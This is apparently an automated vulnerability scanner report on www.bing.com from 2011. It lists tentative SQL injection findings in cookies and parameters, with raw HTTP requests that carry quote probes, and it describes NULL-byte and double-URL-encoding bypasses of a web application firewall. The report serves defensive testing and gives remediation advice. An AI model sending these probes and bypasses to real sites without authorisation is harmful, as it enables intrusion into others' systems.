<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.93. http://www.bing.com/blogs/search [_SS cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/blogs/search

Issue detail

The _SS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _SS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blogs/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846'; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 7936
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:50:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /blogs/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846''; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14173
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:50:26 GMT
Connection: close
Set-Cookie: _UR=OMW=1; expires=Sat, 02-Feb-2013 13:50:26 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.94. http://www.bing.com/explore [SRCHD cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/explore

Issue detail

The SRCHD cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHD cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /explore HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM';

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 9005
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24596
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.95. http://www.bing.com/explore [_HOP cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/explore

Issue detail

The _HOP cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _HOP cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 9005
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24553
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.96. http://www.bing.com/local/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/local/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /local/Default.aspx?cat=11168&1%00'=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 7897
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:50:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /local/Default.aspx?cat=11168&1%00''=1 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Thu, 03 Feb 2011 15:50:14 GMT
Last-Modified: Thu, 03 Feb 2011 13:50:14 GMT
X-BM-TraceID: 6f9f504f1e244d9b95881ad2fd3fbaca
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=a4a4fe9f0a3b499b914884c549fc7382; path=/local
Set-Cookie: CID=2b24cef09a0c4b6e8e8466d6f4f1aee3; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/3/2011 1:50:14 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: VE_LSV=cache=0; path=/local
Content-Length: 80666

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...

1.97. http://www.bing.com/scopePopupHandler.aspx [FBB cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/scopePopupHandler.aspx

Issue detail

The FBB cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the FBB cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the FBB cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /scopePopupHandler.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0%2527; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 9065
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:49:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /scopePopupHandler.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0%2527%2527; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4834
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:49:53 GMT
Connection: close
Set-Cookie: _UR=OMW=1; expires=Sat, 02-Feb-2013 13:49:53 GMT; domain=.bing.com; path=/

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&qpvt=wallpaper" onmousedown="return
...[SNIP]...

1.98. http://www.bing.com/scopePopupHandler.aspx [SRCHUSR cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/scopePopupHandler.aspx

Issue detail

Request 1

GET /scopePopupHandler.aspx?IID=SERP.2&IG=0bb4d21952274097a40b867a00f161a8&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112'; _UR=OMW=0; _FP=; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OrigMUID=DC63BAA44C3843F38378B4BB213E0A6F%2c0bb4d21952274097a40b867a00f161a8; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:46:20 GMT
Connection: close
Set-Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; expires=Sat, 02-Feb-2013 13:46:20 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=DC63BAA44C3843F38378B4BB213E0A6F%2c0bb4d21952274097a40b867a00f161a8; expires=Sat, 02-Feb-2013 13:46:20 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1626586&SM=1&D=1593447&AF=NOFORM; expires=Sat, 02-Feb-2013 13:46:20 GMT; domain=.bing.com; path=/
Content-Length: 16696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /scopePopupHandler.aspx?IID=SERP.2&IG=0bb4d21952274097a40b867a00f161a8&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112''; _UR=OMW=0; _FP=; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OrigMUID=DC63BAA44C3843F38378B4BB213E0A6F%2c0bb4d21952274097a40b867a00f161a8; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:46:21 GMT
Connection: close
Set-Cookie: _UR=OMW=1; expires=Sat, 02-Feb-2013 13:46:21 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1626586&SM=1&D=1593447&AF=NOFORM; expires=Sat, 02-Feb-2013 13:46:21 GMT; domain=.bing.com; path=/
Content-Length: 4603

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&qpvt=wallpaper" onmousedown="return
...[SNIP]...

1.99. http://www.bing.com/scopePopupHandler.aspx [_FP cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/scopePopupHandler.aspx

Issue detail

The _FP cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _FP cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the _FP cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /scopePopupHandler.aspx?IID=SERP.2&IG=0bb4d21952274097a40b867a00f161a8&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; _FP=%2527; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OrigMUID=DC63BAA44C3843F38378B4BB213E0A6F%2c0bb4d21952274097a40b867a00f161a8; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:46:23 GMT
Connection: close
Set-Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; expires=Sat, 02-Feb-2013 13:46:23 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=DC63BAA44C3843F38378B4BB213E0A6F%2c0bb4d21952274097a40b867a00f161a8; expires=Sat, 02-Feb-2013 13:46:23 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1626586&SM=1&D=1593447&AF=NOFORM; expires=Sat, 02-Feb-2013 13:46:23 GMT; domain=.bing.com; path=/
Content-Length: 16696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /scopePopupHandler.aspx?IID=SERP.2&IG=0bb4d21952274097a40b867a00f161a8&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; _FP=%2527%2527; _HOP=; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F; MUID=DC63BAA44C3843F38378B4BB213E0A6F; OrigMUID=DC63BAA44C3843F38378B4BB213E0A6F%2c0bb4d21952274097a40b867a00f161a8; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 13:46:23 GMT
Connection: close
Set-Cookie: _UR=OMW=1; expires=Sat, 02-Feb-2013 13:46:23 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1626586&SM=1&D=1593447&AF=NOFORM; expires=Sat, 02-Feb-2013 13:46:23 GMT; domain=.bing.com; path=/
Content-Length: 4603

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&qpvt=wallpaper" onmousedown="return
...[SNIP]...

1.100. http://www.bing.com/settings.aspx [MUID cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/settings.aspx

Issue detail

The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 9686
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:41 GMT
Connection: close
Set-Cookie: MUID=F9475FDDB9F94CAB83C74CD2E60E77D8; expires=Sat, 02-Feb-2013 13:48:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F9475FDDB9F94CAB83C74CD2E60E77D8%2c19462242ab2b4105be64435409f9d75a; expires=Sat, 02-Feb-2013 13:48:41 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1626588&SM=1&D=1593447&AF=NOFORM; expires=Sat, 02-Feb-2013 13:48:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20621
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:42 GMT
Connection: close
Set-Cookie: MUID=40C6CACE9FA54F6C937C43ABCBCC3117; expires=Sat, 02-Feb-2013 13:48:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=40C6CACE9FA54F6C937C43ABCBCC3117%2c33415e144b1f45ffab73296ff347bd47; expires=Sat, 02-Feb-2013 13:48:41 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1626588&SM=1&D=1593447&AF=NOFORM; expires=Sat, 02-Feb-2013 13:48:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.101. http://www.bing.com/settings.aspx [SRCHUSR cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/settings.aspx

Issue detail

The SRCHUSR cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHUSR cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the SRCHUSR cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
